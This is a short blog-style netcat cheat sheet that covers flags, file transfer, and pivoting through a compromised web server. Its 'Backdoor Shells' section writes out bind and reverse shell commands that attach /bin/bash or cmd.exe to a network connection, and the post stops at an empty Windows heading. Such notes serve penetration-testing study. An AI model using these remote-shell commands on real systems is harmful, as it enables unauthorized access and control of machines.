---
layout: post
title:  "Netcat"
categories: Netcat
tags:  nc netcat shell backdoor
author: Trelis
---

* content
{:toc}

# Description
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. 




# Fundamentals
In order to establish a connection, a client and a listener are needed. First of all, there must be a netcat listening at some port in the target machine:
```
nc -l -p LocalPort
``` 
With the following the attacker machine is able to establish the connection:
```
nc IP Port
```
Both the client and listener take input from STDIN 
and send data received from the network to STDOUT

# Flags
-l: Listen mode (default is client mode)
-L: Listen harder (supported only on Windows version of Netcat). This option makes Netcat a persistent listener which starts listening again after a client disconnects
-u: UDP mode (default is TCP)
-p: Local port (In listen mode, this is port listened on. In client mode, this is source port for all packets sent)
-e: Program to execute after connection occurs, connecting STDIN and STDOUT to the program
-n: Don’t perform DNS lookups on names of machines on the other side
-z: Zero
-I/O mode (Don’t send any data, just emit a packet without payload)
-wN: Timeout for connects, waits for N seconds after closure of STDIN. A Netcat client or listener with this option will wait for N seconds to make a connection. If the connection doesn’t happen in that time, Netcat stops running.
-v: Be verbose, printing out messages on Standard Error, such as when a connection occurs
-vv: Be very verbose, printing even more details on Standard Error

# File Transfer
## File from client to target
Listening
```
nc -l -p LocalPort > outfile
```
Connect
```
nc -w3 IP Port < infile
```

## File from target to client
Listening
```
nc -l -p LocalPort < inflie
```
Connect
```
nc -w3 IP Port > outfile
```

# Backdoor Shells
## Linux
Listening
```
nc -l -p LocalPort -e /bin/bash
```
Connect
```
nc IP Port -e /bin/bash
```

## Windows
Listening
```
C:\ nc -l -p Port -e cmd.exe
```
Connect
```
nc IP Port -e cmd.exe
```


# Relays
There are two networks. Our attacking machine and a web server that has access to the other network which has a Windows and Linux machine. Our attacking machine does not have direct access to it, but the web server does.

[IMG relay]

We’ve already compromised the web server and obtained SSH access to it as the user webmaster. Our goal is to use the web server as our pivot and obtain a remote shell on the Windows and Linux machine.


## Linux
https://blog.techorganic.com/2012/10/16/introduction-to-pivoting-part-3-ncat/

## Windows